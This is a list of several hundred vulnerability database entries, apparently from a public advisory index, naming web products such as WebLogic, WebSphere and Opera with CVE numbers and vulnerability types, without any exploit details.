[89309] Web Mail CVE-2005-3132 Information Disclosure Vulnerability
[89304] vxWeb CVE-2005-3033 Denial-Of-Service Vulnerability
[89290] Opera Web Browser CVE-2005-3059 Remote Security Vulnerability
[89268] Dr.Web Antivirus CVE-2005-3218 Security Bypass Vulnerability
[89219] Opera Web Browser CVE-2005-3699 Remote Security Vulnerability
[89214] Websphere Application Server CVE-2005-3760 Denial-Of-Service Vulnerability
[89180] Nextweb (I)Site CVE-2005-1834 SQL-Injection Vulnerability
[89178] Websphere Application Server CVE-2005-1872 Remote Security Vulnerability
[89138] ONE Web Server CVE-2005-2094 Cross-Site Scripting Vulnerability
[89116] Weblogic Server CVE-2005-2092 Cross-Site Scripting Vulnerability
[89107] Websphere Application Server CVE-2005-2091 Cross-Site Scripting Vulnerability
[89098] Dynamic Biz Website Builder Quickweb CVE-2005-2135 SQL-Injection Vulnerability
[89051] WebEOC CVE-2005-4029 Remote Security Vulnerability
[89047] WebEOC CVE-2005-4002 Remote Security Vulnerability
[88975] Javaserver Web Dev Kit CVE-2001-0404 Directory Traversal Vulnerability
[88944] WebIntelligence CVE-2005-4274 Denial-Of-Service Vulnerability
[88943] Iplanet Web Server CVE-2001-0431 Remote Security Vulnerability
[88924] Cisco WebEx Meetings Server CVE-2016-1389 Open Redirection Vulnerability
[88921] Webmail CVE-2005-4368 Remote Security Vulnerability
[88881] Websphere Plugin CVE-2001-0312 Remote Security Vulnerability
[88880] WebSphere Commerce Suite CVE-2001-0446 Remote Security Vulnerability
[88865] Content2Web CVE-2005-3017 Cross-Site Scripting Vulnerability
[88864] Savant Webserver CVE-2001-0433 Denial-Of-Service Vulnerability
[88846] Personal Web Sharing CVE-2001-0649 Denial-Of-Service Vulnerability
[88822] Websweeper CVE-2001-0460 Denial-Of-Service Vulnerability
[88796] Savewebportal CVE-2005-2688 Cross-Site Scripting Vulnerability
[88791] Web-Enabled Management CVE-2001-0374 Security Bypass Vulnerability
[88716] Pi3web CVE-2002-0433 Remote Security Vulnerability
[88708] Scriptease Webserver CVE-2002-0323 Remote Security Vulnerability
[88677] Java System Web Proxy Server CVE-2005-4806 Denial-Of-Service Vulnerability
[88676] Opera Web Browser CVE-2005-4718 Denial-Of-Service Vulnerability
[88673] Weblogic Server CVE-2005-4705 Remote Security Vulnerability
[88668] Weblogic Server CVE-2005-4704 Remote Security Vulnerability
[88645] Iplanet Web Server CVE-2001-1368 Remote Security Vulnerability
[88641] Netsuite Web Server CVE-2001-0275 Denial-Of-Service Vulnerability
[88638] GoAhead WebServer CVE-2001-0228 Directory Traversal Vulnerability
[88636] Phpwebsite CVE-2001-1363 Remote Security Vulnerability
[88632] Website Pro CVE-1999-1180 Remote Security Vulnerability
[88624] BiblioWeb Server CVE-2001-0227 Denial-Of-Service Vulnerability
[88521] Note-A-Day Weblog CVE-2006-0404 Information Disclosure Vulnerability
[88490] Weblogic Server CVE-2006-0419 Denial-Of-Service Vulnerability
[88461] Weblogic Server CVE-2006-0420 Denial-Of-Service Vulnerability
[88453] Icq Web Front CVE-2000-1078 Denial-Of-Service Vulnerability
[88445] Web Server CVE-1999-1081 Remote Security Vulnerability
[88433] Free Java Web Server CVE-2001-0186 Directory Traversal Vulnerability
[88429] Spymac Web Os CVE-2005-3511 Cross-Site Scripting Vulnerability
[88412] BiblioWeb Server CVE-2001-0226 Directory Traversal Vulnerability
[88397] Falcon Web Server CVE-1999-0882 Remote Security Vulnerability
[88381] Axwebremovectrl CVE-2005-3693 Remote Security Vulnerability
[88376] Web-Based Enterprise Management CVE-1999-0982 Local Security Vulnerability
[88309] Websitetool CVE-2000-0110 Remote Security Vulnerability
[88283] Iplanet Web Server CVE-2000-0182 Denial-Of-Service Vulnerability
[88223] WebTV for Windows 98 CVE-2000-0082 Remote Security Vulnerability
[88135] Web Blog CVE-2006-0845 Remote Security Vulnerability
[88115] Webdrive CVE-2006-0867 Denial-Of-Service Vulnerability
[88107] V-webmail CVE-2006-0794 Remote Security Vulnerability
[88033] Selena Sol Webstore CVE-1999-0604 Remote Security Vulnerability
[88023] Webcart CVE-1999-0610 Remote Security Vulnerability
[88009] WebCalendar CVE-2005-3984 SQL-Injection Vulnerability
[87996] Secure Web Console CVE-1999-0829 Remote Security Vulnerability
[87965] Roxen Web Server CVE-1999-1522 Remote Security Vulnerability
[87852] Webcam32 CVE-1999-1292 Remote Security Vulnerability
[87797] Backweb Client CVE-1999-1277 Local Security Vulnerability
[87781] Webramp CVE-1999-1264 Remote Security Vulnerability
[87761] Squid Web Proxy CVE-1999-1273 Remote Security Vulnerability
[87739] Phpwebsite CVE-2003-0737 Remote Security Vulnerability
[87737] Phpwebsite CVE-2003-0738 Denial-Of-Service Vulnerability
[87726] WebNS CVE-2003-0677 Denial-Of-Service Vulnerability
[87714] Weblogic Server CVE-2003-0640 Remote Security Vulnerability
[87699] WebCalendar CVE-2006-1537 Information Disclosure Vulnerability
[87696] Websphere Application Server CVE-2006-1619 Denial-Of-Service Vulnerability
[87684] Apt-Webshop-System CVE-2006-1686 Remote Security Vulnerability
[87681] Websense CVE-2006-2035 Local Security Vulnerability
[87671] PhpWebGallery CVE-2006-2041 Remote Security Vulnerability
[87661] Web+ Shop CVE-2006-1897 Information Disclosure Vulnerability
[87653] Websphere Application Server CVE-2006-2429 Remote Security Vulnerability
[87644] Websphere Application Server CVE-2006-2430 Remote Security Vulnerability
[87642] Websphere Application Server CVE-2006-2434 Information Disclosure Vulnerability
[87641] Websphere Application Server CVE-2006-2436 Remote Security Vulnerability
[87639] Websphere Application Server CVE-2006-2435 Remote Security Vulnerability
[87635] Websphere Application Server CVE-2006-2432 Remote Security Vulnerability
[87624] Websphere Application Server CVE-2006-2433 Remote Security Vulnerability
[87622] Weblogic Server CVE-2006-2466 Remote Security Vulnerability
[87610] Weblogic Server CVE-2006-2469 Remote Security Vulnerability
[87607] Weblogic Server CVE-2006-2462 Remote Security Vulnerability
[87604] Weblogic Server CVE-2006-2546 Remote Security Vulnerability
[87603] Weblogic Server CVE-2006-2470 Security Bypass Vulnerability
[87602] Weblogic Server CVE-2006-2467 Remote Security Vulnerability
[87600] Weblogic Server CVE-2006-2471 Information Disclosure Vulnerability
[87599] Weblogic Server CVE-2006-2468 Information Disclosure Vulnerability
[87598] Weblogic Server CVE-2006-2461 Remote Security Vulnerability
[87597] Weblogic Server CVE-2006-2464 Local Security Vulnerability
[87595] Weblogic Server CVE-2006-2472 Local Security Vulnerability
[87588] Websphere Application Server CVE-2006-5324 Remote Security Vulnerability
[87570] Websphere Application Server CVE-2006-5323 Remote Security Vulnerability
[87547] Webglimpse CVE-2005-4354 Cross-Site Scripting Vulnerability
[87542] PhpWebThings CVE-2005-4226 SQL-Injection Vulnerability
[87516] Java System Web Server CVE-2009-3878 Remote Security Vulnerability
[87503] WebSphere Business Events CVE-2009-2741 Remote Security Vulnerability
[87472] Nweb2fax CVE-2008-6669 Remote Security Vulnerability
[87468] Web File Explorer CVE-2009-1314 Remote Security Vulnerability
[87435] iWeb Server CVE-2003-0475 Directory Traversal Vulnerability
[87427] iWeb Server CVE-2003-0474 Directory Traversal Vulnerability
[87390] Business Card Web Builder CVE-2006-5816 Remote Security Vulnerability
[87380] Web Directory Pro CVE-2006-5905 Remote Security Vulnerability
[87363] Web Mech Designer CVE-2006-5896 Remote Security Vulnerability
[87361] Sap Web Application Server CVE-2006-6010 Information Disclosure Vulnerability
[87358] Netwebadmin Enterprise CVE-2006-6239 Remote Security Vulnerability
[87329] Sap Web Application Server CVE-2006-6011 Denial-Of-Service Vulnerability
[87284] Websphere Host On-Demand CVE-2006-6537 Security Bypass Vulnerability
[87254] Atmail Webmail CVE-2006-6701 Cross-Site Request Forgery Vulnerability
[87221] Wallpaper Complete Website CVE-2006-6215 SQL-Injection Vulnerability
[87202] Seleniumserver Web Server CVE-2006-6124 Cross-Site Scripting Vulnerability
[87181] Helm Web Hosting Control Panel CVE-2006-5984 Cross-Site Scripting Vulnerability
[87151] Wsmp3 Web Server CVE-2003-0338 Directory Traversal Vulnerability
[87148] Snowblind Web Server CVE-2003-0312 Directory Traversal Vulnerability
[87140] Snowblind Web Server CVE-2003-0313 Directory Traversal Vulnerability
[87128] Snowblind Web Server CVE-2003-0315 Denial-Of-Service Vulnerability
[87104] Webhost Directory CVE-2006-6819 Information Disclosure Vulnerability
[87101] Webhost Directory CVE-2006-6817 Information Disclosure Vulnerability
[87078] FreeWebshop CVE-2006-6941 Information Disclosure Vulnerability
[87077] Opera Web Browser CVE-2006-6970 Security Bypass Vulnerability
[87068] Opera Web Browser CVE-2006-6955 Denial-Of-Service Vulnerability
[87063] Direct Web Remoting CVE-2006-6916 Denial-Of-Service Vulnerability
[87008] Myweb4net Browser CVE-2006-6983 Remote Security Vulnerability
[86998] GroupWise WebAccess CVE-2001-1233 Remote Security Vulnerability
[86977] Webgui CVE-2006-0165 Cross-Site Scripting Vulnerability
[86933] Helm Web Hosting Control Panel CVE-2005-4747 Cross-Site Scripting Vulnerability
[86921] Rt Internet Solutions Webadmin CVE-2005-4669 SQL-Injection Vulnerability
[86912] Slwebmail CVE-2003-0267 Remote Security Vulnerability
[86907] Acweb CVE-2002-2421 Denial-Of-Service Vulnerability
[86896] Slwebmail CVE-2003-0268 Remote Security Vulnerability
[86889] Slwebmail CVE-2003-0266 Denial-Of-Service Vulnerability
[86864] Websphere Application Server CVE-2006-7164 Information Disclosure Vulnerability
[86814] Websphere Application Server CVE-2006-7198 Remote Security Vulnerability
[86801] Webulas CVE-2007-0154 Information Disclosure Vulnerability
[86731] FreeWebshop CVE-2007-0531 Remote Security Vulnerability
[86720] Neon Labs Website CVE-2007-0496 Remote Security Vulnerability
[86673] 04Webserver CVE-2002-2216 Information Disclosure Vulnerability
[86671] Secure Web Server For Tru64 CVE-2002-2264 Denial-Of-Service Vulnerability
[86638] Web Security CVE-2007-0564 Denial-Of-Service Vulnerability
[86629] Webbuilder CVE-2007-0703 Remote Security Vulnerability
[86608] Jportal Web Server CVE-2007-0912 Cross-Site Request Forgery Vulnerability
[86593] J-Web Pics Navigator CVE-2007-1143 Directory Traversal Vulnerability
[86581] webSPELL CVE-2007-1160 Security Bypass Vulnerability
[86573] WebAPP CVE-2007-1259 Remote Security Vulnerability
[86570] webSPELL CVE-2007-1155 File-Upload Vulnerability
[86531] Java System Web Server CVE-2007-1526 Remote Security Vulnerability
[86528] WebAPP CVE-2007-1489 Cross-Site Request Forgery Vulnerability
[86402] Typolight Webcms CVE-2007-1632 Remote Security Vulnerability
[86398] Opera Web Browser CVE-2007-1737 Security Bypass Vulnerability
[86373] WebAPP CVE-2007-1829 Remote Security Vulnerability
[86359] WebAPP CVE-2007-1831 Remote Security Vulnerability
[86357] WebAPP CVE-2007-1832 Remote Security Vulnerability
[86354] Web Php CVE-2007-1957 Remote Security Vulnerability
[86333] Webslider CVE-2007-2067 Remote Security Vulnerability
[86264] Selena Sol Webstore CVE-1999-0604 Remote Security Vulnerability
[86260] Webcart CVE-1999-0610 Remote Security Vulnerability
[86233] Webspeed Messenger CVE-2007-2354 Information Disclosure Vulnerability
[86232] NaviCOPA Web Server CVE-2007-2336 Denial-Of-Service Vulnerability
[86231] Direct Web Remoting CVE-2007-2377 Denial-Of-Service Vulnerability
[86228] Web Toolkit CVE-2007-2378 Denial-Of-Service Vulnerability
[86220] webSPELL CVE-2007-2368 Remote Security Vulnerability
[86180] Weblog CVE-2007-2574 Denial-Of-Service Vulnerability
[86172] Weblogic Server CVE-2007-2701 Security Bypass Vulnerability
[86169] Weblogic Server CVE-2007-2699 File-Upload Vulnerability
[86166] Weblogic Server CVE-2007-2695 Remote Security Vulnerability
[86159] WebLogic Workshop CVE-2007-2705 Directory Traversal Vulnerability
[86158] Weblogic Server CVE-2007-2696 Remote Security Vulnerability
[86157] Webgui CVE-2007-2746 Information Disclosure Vulnerability
[86155] Weblogic Server CVE-2007-2697 Denial-Of-Service Vulnerability
[86154] Weblogic Server CVE-2007-2700 Information Disclosure Vulnerability
[86149] Weblogic Server CVE-2007-2698 Remote Security Vulnerability
[86147] Web Intelligence CVE-2007-2689 Remote Security Vulnerability
[86145] Weblogic Server CVE-2007-2704 Denial-Of-Service Vulnerability
[86143] WebLogic Portal CVE-2007-2703 Remote Security Vulnerability
[86131] Webavis CVE-2007-2943 Remote Security Vulnerability
[86121] Web Directory CVE-2007-2979 Information Disclosure Vulnerability
[86101] Image Gallery Web Application CVE-2007-3229 Information Disclosure Vulnerability
[86081] PhpWebThings CVE-2007-3141 Remote Security Vulnerability
[86080] Comdev Web Blogger CVE-2007-3084 Remote Security Vulnerability
[86079] Websphere Portal CVE-2007-3127 Information Disclosure Vulnerability
[85978] IBM WebSphere Application Server CVE-2016-0306 Information Disclosure Vulnerability
[85861] Eaton Lighting Systems EG2 Web Control Security Bypass and Information Disclosure Vulnerabilities
[85765] ICONICS WebHMI CVE-2016-2289 Directory Traversal Vulnerability
[85688] WebAPP CVE-2007-3424 Remote Security Vulnerability
[85687] WebAPP CVE-2007-3423 Remote Security Vulnerability
[85685] WebAPP CVE-2007-3422 Remote Security Vulnerability
[85683] WebAPP CVE-2007-3421 Remote Security Vulnerability
[85673] WebAPP CVE-2007-3420 Remote Security Vulnerability
[85670] WebAPP CVE-2007-3419 Remote Security Vulnerability
[85667] SerWeb CVE-2007-3359 Remote Security Vulnerability
[85663] WebAPP CVE-2007-3418 Remote Security Vulnerability
[85654] Webapp CVE-2007-3416 Cross-Site Request Forgery Vulnerability
[85563] Java System Web Server CVE-2006-5654 Denial-Of-Service Vulnerability
[85524] Stampit Web CVE-2007-3871 Denial-Of-Service Vulnerability
[85508] Webbler CMS CVE-2007-4072 Information Disclosure Vulnerability
[85498] Webbler CMS CVE-2007-4073 Remote Security Vulnerability
[85497] Websphere Application Server CVE-2007-3960 Remote Security Vulnerability
[85441] Weblogic Server CVE-2007-4617 Denial-Of-Service Vulnerability
[85418] Websphere Application Server CVE-2007-4839 Remote Security Vulnerability
[85360] Opera Web Browser CVE-2007-4944 Information Disclosure Vulnerability
[85345] Webmedia Explorer CVE-2007-4948 Remote Security Vulnerability
[85340] Xkiosk Web CVE-2007-5314 Remote Security Vulnerability
[85315] Opera Web Browser CVE-2007-5276 Remote Security Vulnerability
[85247] WebLogic Mobility Server CVE-2007-6384 Remote Security Vulnerability
[85230] GoAhead WebServer CVE-2007-6702 Remote Security Vulnerability
[85224] Webgui CVE-2007-6487 Remote Security Vulnerability
[85218] Websphere Application Server CVE-2007-6679 Remote Security Vulnerability
[85208] IBM Security Access Manager for Web CVE-2015-5010 Information Disclosure Vulnerability
[85206] IBM Security Access Manager for Web CVE-2015-5012 Information Disclosure Vulnerability
[85189] FreeWebshop CVE-2007-6711 Remote Security Vulnerability
[85177] Weblaunch CVE-2008-0221 Directory Traversal Vulnerability
[85173] WebSphere MQ CVE-2007-6705 Local Security Vulnerability
[85160] webSPELL CVE-2008-0575 Cross-Site Request Forgery Vulnerability
[85127] WebLogic Portal CVE-2008-0870 Remote Security Vulnerability
[85126] Weblogic Server CVE-2008-0898 Security Bypass Vulnerability
[85124] Weblogic Server CVE-2008-0863 Information Disclosure Vulnerability
[85122] Weblogic Server CVE-2008-0897 Security Bypass Vulnerability
[85120] Weblogic Server CVE-2008-0901 Remote Security Vulnerability
[85116] WebLogic Portal CVE-2008-0865 Security Bypass Vulnerability
[85113] WebLogic Portal CVE-2008-0896 Security Bypass Vulnerability
[85111] Weblogic Server CVE-2008-0900 Remote Security Vulnerability
[85110] Weblogic Server CVE-2008-0895 Security Bypass Vulnerability
[85109] WebLogic Portal CVE-2008-0864 Security Bypass Vulnerability
[85105] Weblogic Server CVE-2008-0903 Denial-Of-Service Vulnerability
[85091] Prost Web Management CVE-2008-1543 Remote Security Vulnerability
[85089] IBM Business Process Manager Advanced and WebSphere Process Server Security Bypass Vulnerability
[85069] WebKit Multiple Security Vulnerabilities
[85063] WebKit CVE-2016-1780 Information Disclosure Vulnerability
[85062] WebKit Multiple Unspecified Memory Corruption and Denial of Service Vulnerabilities
[85043] WorkSite Web CVE-2008-1700 Denial-Of-Service Vulnerability
[85011] Websphere Application Server CVE-2008-2550 Remote Security Vulnerability
[84965] Snowblind Web Server CVE-2003-0314 Denial-Of-Service Vulnerability
[84946] IBM WebSphere Application Server CVE-2016-0283 Cross Site Scripting Vulnerability
[84937] V-webmail CVE-2008-3061 Remote Security Vulnerability
[84925] V-webmail CVE-2008-3060 Information Disclosure Vulnerability
[84913] Web Wiz Forum CVE-2008-3392 Cross-Site Request Forgery Vulnerability
[84903] Websphere Application Server CVE-2008-3236 Information Disclosure Vulnerability
[84826] Websphere Application Server CVE-2008-4285 Denial-Of-Service Vulnerability
[84824] Opera Web Browser CVE-2008-4292 Remote Security Vulnerability
[84803] Comdev Web Blogger CVE-2006-5441 Remote Security Vulnerability
[84794] Websphere Application Server CVE-2006-5324 Remote Security Vulnerability
[84791] Nuralstorm Webmail CVE-2006-5386 Remote Security Vulnerability
[84788] Websphere Application Server CVE-2006-5323 Remote Security Vulnerability
[84773] PhpWebGallery CVE-2008-4702 File-Upload Vulnerability
[84765] Sports Clubs Web Portal CVE-2008-4592 File-Upload Vulnerability
[84730] Webcards CVE-2008-4878 File-Upload Vulnerability
[84676] Secure Web Gateway CVE-2008-5540 Security Bypass Vulnerability
[84638] Webmail CVE-2008-5620 Denial-Of-Service Vulnerability
[84624] Webboard CVE-2008-5956 Information Disclosure Vulnerability
[84620] Discussion Web CVE-2008-5886 Information Disclosure Vulnerability
[84607] FactoSystem Weblog CVE-2008-5935 Information Disclosure Vulnerability
[84412] Opera Web Browser CVE-2008-7245 Denial-Of-Service Vulnerability
[84323] IBM WebSphere Commerce CVE-2016-0208 Denial of Service Vulnerability
[84203] Neon Webmail CVE-2006-4954 Remote Security Vulnerability
[84202] Neon Webmail CVE-2006-4952 Remote Security Vulnerability
[84199] Neon Webmail CVE-2006-4955 Multiple Directory Traversal Vulnerabilities
[84198] Neon Webmail CVE-2006-4951 Remote Security Vulnerability
[84151] Web Server Creator CVE-2006-4746 Remote Security Vulnerability
[84004] PhpWebGallery CVE-2006-1600 SQL-Injection Vulnerability
[83994] Apt-Webshop-System CVE-2006-1687 Cross-Site Scripting Vulnerability
[83991] Web Conferencing Pro CVE-2006-1474 Cross-Site Scripting Vulnerability
[83985] PhpWebGallery CVE-2006-1674 Cross-Site Scripting Vulnerability
[83954] Open Webmail CVE-2006-2190 Cross-Site Scripting Vulnerability
[83941] Myweb Portal Office CVE-2006-2517 SQL-Injection Vulnerability
[83936] Cisco Web Security Appliance CVE-2016-1288 Denial of Service Vulnerability
[83928] Spymac Web Os CVE-2006-2488 Cross-Site Scripting Vulnerability
[83889] Webhost Directory CVE-2006-2618 Cross-Site Scripting Vulnerability
[83888] Webhost Directory CVE-2006-2616 SQL-Injection Vulnerability
[83880] Webhost Directory CVE-2006-2617 SQL-Injection Vulnerability
[83840] Cabacos Web Cms CVE-2006-2963 Cross-Site Scripting Vulnerability
[83747] Webex Downloader Activex Control CVE-2006-3424 Remote Security Vulnerability
[83722] IBM WebSphere Portal CVE-2015-7491 Unspecified Cross Site Scripting Vulnerability
[83685] iWebNegar CVE-2006-4496 Cross-Site Scripting Vulnerability
[83637] webSPELL CVE-2006-4783 SQL-Injection Vulnerability
[83634] IBM WebSphere DataPower XC10 Appliance CVE-2015-7418 Local Information Disclosure Vulnerability
[83622] FreeWebshop CVE-2006-5772 SQL-Injection Vulnerability
[83558] Mini Web Server CVE-2007-0525 Remote Security Vulnerability
[83529] WebAPP CVE-2007-1827 Remote Security Vulnerability
[83509] IBM WebSphere Portal CVE-2015-7455 Security Bypass Vulnerability
[83500] IBM WebSphere Portal CVE-2016-0244 Unspecified Cross Site Scripting Vulnerability
[83494] IBM WebSphere Portal CVE-2015-7457 Unspecified Cross Site Scripting Vulnerability
[83488] IBM WebSphere Portal CVE-2016-0243 Unspecified Cross Site Scripting Vulnerability
[83485] IBM WebSphere CVE-2016-0245 Portal XML External Entity Denial of Service Vulnerability
[83479] IBM WebSphere Portal CVE-2015-7428 Unspecified Open Redirection Vulnerability
[83418] Zimbra Mail interface CVE-2015-6541 Cross Site Request Forgery Vulnerability
[83413] Webgui CVE-2006-0165 Cross Site Scripting Vulnerability
[83393] WebSVN CVE-2016-2511 Cross Site Scripting Vulnerability
[83293] RETIRED: Cisco Adaptive Security Appliance WebVPN Portal Cross Site Scripting Vulnerability
[83279] IBM WebSphere Commerce CVE-2016-0225 Information Disclosure Vulnerability
[83237] Websphere Application Server CVE-2006-4222 Remote Security Vulnerability
[83233] Websphere Application Server CVE-2006-4223 Information Disclosure Vulnerability
[83231] Tinywebgallery CVE-2006-4166 Remote Security Vulnerability
[83230] Webinsta Cms CVE-2006-4217 Remote Security Vulnerability
[83090] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities
[83083] NCSA WebServer CVE-1999-0232 Remote Security Vulnerability
[83080] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities
[83072] Ncsa Web Server CVE-1999-0235 Remote Security Vulnerability
[83055] Advantech WebAccess Multiple Heap Buffer Overflow Vulnerabilities
[83040] Third Voice Web CVE-1999-1167 Cross-Site Scripting Vulnerability
[83020] Advantech WebAccess Multiple Stack Buffer Overflow Vulnerabilities
[82992] IBM WebSphere MQ CVE-2015-2012 Local Information Disclosure Vulnerability
[82977] Web File Explorer CVE-2009-1314 Remote Security Vulnerability
[82965] eTrust Antivirus WebScan CVE-2006-3977 Remote Security Vulnerability
[82949] IBM WebSphere Commerce CVE-2015-7444 Local Information Disclosure Vulnerability
[82886] Web Search CVE-2002-0530 Cross-Site Scripting Vulnerability
[82862] Web Mail CVE-2002-1899 Cross-Site Scripting Vulnerability
[82854] WebRamp 200i CVE-1999-0438 Denial-Of-Service Vulnerability
[82830] Portail Web Php CVE-2002-2278 Cross-Site Scripting Vulnerability
[82815] Webramp CVE-1999-0437 Denial-Of-Service Vulnerability
[82814] Activwebserver CVE-2002-2189 Cross-Site Scripting Vulnerability
[82784] Affordable Web Space Design Webbbs CVE-2003-0479 Cross-Site Scripting Vulnerability
[82779] Wsmp3 Web Server CVE-2003-0339 Remote Security Vulnerability
[82724] Phpwebsite CVE-2003-0735 SQL-Injection Vulnerability
[82720] Phpwebsite CVE-2003-0736 Cross-Site Scripting Vulnerability
[82711] FoxWeb CVE-2003-0762 Remote Security Vulnerability
[82702] Webexpert CVE-2003-1586 Cross-Site Scripting Vulnerability
[82690] WebSTAR CVE-2004-0695 Remote Security Vulnerability
[82689] WebLog Expert CVE-2003-1585 Cross-Site Scripting Vulnerability
[82685] Webtrends Log Analyzer CVE-2003-1583 Cross-Site Scripting Vulnerability
[82684] ONE Web Server CVE-2003-1577 Cross-Site Scripting Vulnerability
[82682] Microsoft Windows WebDAV CVE-2016-0051 Local Privilege Escalation Vulnerability
[82677] Webzedit CVE-2004-0314 Cross-Site Scripting Vulnerability
[82591] pgn2web CVE-2004-1290 Remote Security Vulnerability
[82578] Forum Web Server CVE-2004-2346 Cross-Site Scripting Vulnerability
[82572] Phpwebsite CVE-2004-2322 SQL-Injection Vulnerability
[82548] IBM WebSphere Portal CVE-2015-7472 Unspecified LDAP Injection Vulnerability
[82502] IBM WebSphere Business Events CVE-2009-2741 Remote Security Vulnerability
[82452] Backweb Polite Agent Protocol CVE-1999-0395 Remote Security Vulnerability
[82450] Cisco WebEx Meetings Server CVE-2016-1309 Multiple Cross Site Scripting Vulnerabilities
[82434] WebCalendar CVE-2005-0474 SQL-Injection Vulnerability
[82408] Sauter moduWeb Vision Multiple Security Vulnerabilities
[82356] Java System Web Proxy Server CVE-2005-1232 Remote Security Vulnerability
[82354] Webcamxp Pro CVE-2005-1189 Cross-Site Scripting Vulnerability
[82337] Java System Web Server CVE-2009-3878 Remote Security Vulnerability
[82243] Multiple WEBSQUARE JOB-CUBE Products CVE-2016-1144 Unspecified Cross Site Scripting Vulnerability
[82188] WebHost Manager CVE-2006-6548 Cross-Site Scripting Vulnerability
[82172] Atmail Webmail System CVE-2006-6700 Cross-Site Scripting Vulnerability
[82152] Atmail Webmail CVE-2006-6702 Cross-Site Scripting Vulnerability
[82149] Atmail Webadmin CVE-2006-6704 Cross-Site Scripting Vulnerability
[82098] Metaweb CVE-1999-0268 Remote Security Vulnerability
[82094] Java Web Server CVE-1999-0283 Remote Security Vulnerability
[82068] MIMEsweeper For Web CVE-2006-3523 Denial-Of-Service Vulnerability
[82041] com_weblinks CVE-2006-7247 SQL-Injection Vulnerability
[82015] Simple Web Cms CVE-2007-0093 SQL-Injection Vulnerability
[82008] Cisco Unity Connection Web Framework CVE-2016-1300 Cross Site Scripting Vulnerability
[81988] webSPELL CVE-2007-0492 SQL-Injection Vulnerability
[81971] WebFORM CVE-2007-0547 Cross-Site Scripting Vulnerability
[81935] webSPELL CVE-2007-1154 SQL-Injection Vulnerability
[81919] Online Web Building CVE-2007-1058 SQL-Injection Vulnerability
[81910] WebTester CVE-2007-0970 SQL-Injection Vulnerability
[81897] WebAPP CVE-2007-1177 Cross-Site Scripting Vulnerability
[81892] WebAPP CVE-2007-1175 Cross-Site Scripting Vulnerability
[81882] WebAPP CVE-2007-1176 Cross-Site Scripting Vulnerability
[81881] Bj Webring CVE-2007-1328 Cross-Site Scripting Vulnerability
[81847] Ewebquiz CVE-2007-1706 SQL-Injection Vulnerability
[81837] WebAPP CVE-2007-1830 Cross-Site Scripting Vulnerability
[81830] Ripe Website Manager CVE-2007-2207 SQL-Injection Vulnerability
[81827] My Little Weblog CVE-2007-2102 Cross-Site Scripting Vulnerability
[81825] WebAPP CVE-2007-1828 Cross-Site Scripting Vulnerability
[81807] Roundcube Webmail CVE-2015-8770 Directory Traversal Vulnerability
[81796] Weblogic Server CVE-2007-2694 Cross-Site Scripting Vulnerability
[81786] WebLogic Portal CVE-2007-2702 Cross-Site Scripting Vulnerability
[81749] IBM WebSphere Portal CVE-2016-0209 Unspecified Cross Site Scripting Vulnerability
[81738] IBM WebSphere Application Server CVE-2015-7417 Cross Site Scripting Vulnerability
[81717] WebAPP CVE-2007-3417 Cross-Site Scripting Vulnerability
[81712] Websphere Application Server CVE-2007-3265 Cross-Site Scripting Vulnerability
[81674] WebCit CVE-2007-3822 Cross-Site Scripting Vulnerability
[81618] Webbler CMS CVE-2007-4071 Cross-Site Scripting Vulnerability
[81599] Ripe Website Manager CVE-2007-4523 Cross-Site Scripting Vulnerability
[81598] Web Control Panel CVE-2007-4589 Cross-Site Scripting Vulnerability
[81586] GroupWise WebAccess CVE-2007-4557 Cross-Site Scripting Vulnerability
[81531] Webdoc Cms CVE-2007-6491 SQL-Injection Vulnerability
[81528] Jportal Web Portal CVE-2007-5974 SQL-Injection Vulnerability
[81497] Java System Web Server CVE-2007-6572 Cross-Site Scripting Vulnerability
[81490] WebPortal CMS CVE-2008-0142 SQL-Injection Vulnerability
[81485] Java System Web Server CVE-2007-6571 Cross-Site Scripting Vulnerability
[81479] Java System Web Server CVE-2007-6570 Cross-Site Scripting Vulnerability
[81434] Cisco Web Security Appliance CVE-2016-1296 Remote Security Bypass Vulnerability
[81414] WebLogic Workshop CVE-2008-0866 Cross-Site Scripting Vulnerability
[81410] WebLogic Portal CVE-2008-0868 Cross-Site Scripting Vulnerability
[81409] Weblogic Server CVE-2008-0902 Cross-Site Scripting Vulnerability
[81401] Weblogic Server CVE-2008-0869 Cross-Site Scripting Vulnerability
[81398] Weblogic Server CVE-2008-0899 Cross-Site Scripting Vulnerability
[81385] Advanced Web Photo Gallery CVE-2008-1711 SQL-Injection Vulnerability
[81341] Web Group Communication Center CVE-2008-2446 SQL-Injection Vulnerability
[81324] Smeweb CVE-2008-2652 SQL-Injection Vulnerability
[81309] Weblosning CVE-2008-2506 SQL-Injection Vulnerability
[81263] WebKit Multiple Security Vulnerabilities
[81039] WebChamado CVE-2008-2858 SQL-Injection Vulnerability
[81030] WebMatic CVE-2008-2925 SQL-Injection Vulnerability
[81022] Galatolo Webmanager CVE-2008-2700 SQL-Injection Vulnerability
[81005] Academic Web Tools CVE-2008-2968 SQL-Injection Vulnerability
[80998] CentreWare Web CVE-2008-3122 SQL-Injection Vulnerability
[80996] Academic Web Tools CVE-2008-2967 Cross-Site Scripting Vulnerability
[80995] V-webmail CVE-2008-3063 SQL-Injection Vulnerability
[80968] Groupware Webmail Edition CVE-2008-3650 Cross-Site Scripting Vulnerability
[80949] Webcms Portal Edition CVE-2008-4185 SQL-Injection Vulnerability
[80948] Webcms Portal Edition CVE-2008-4186 SQL-Injection Vulnerability
[80924] IBM WebSphere Commerce CVE-2015-5009 HTML Injection Vulnerability
[80919] IBM WebSphere Commerce CVE-2015-5008 Cross Site Scripting Vulnerability
[80858] PhpWebGallery CVE-2008-4591 Cross-Site Scripting Vulnerability
[80834] Opera Web Browser CVE-2008-4725 Cross-Site Scripting Vulnerability
[80785] Cms Isweb CVE-2008-5934 SQL-Injection Vulnerability
[80784] WebStudio CMS CVE-2008-5336 SQL-Injection Vulnerability
[80782] WebTransactions CVE-2008-5842 Cross-Site Scripting Vulnerability
[80778] Phpclanwebsite CVE-2008-5879 Cross-Site Scripting Vulnerability
[80777] Galatolo Webmanager CVE-2008-6108 Cross-Site Scripting Vulnerability
[80769] PHP JOBWEBSITE PRO CVE-2008-5977 SQL-Injection Vulnerability
[80766] Multi Languages Webshop Online CVE-2008-6268 SQL-Injection Vulnerability
[80762] Galatolo Webmanager CVE-2008-6249 SQL-Injection Vulnerability
[80745] Advantech WebAccess ICSA-16-014-01 Multiple Security Vulnerabilities
[80741] Juniper Junos J-Web CVE-2016-1258 Remote Denial of Service Vulnerability
[80723] WebShop CVE-2008-6627 SQL-Injection Vulnerability
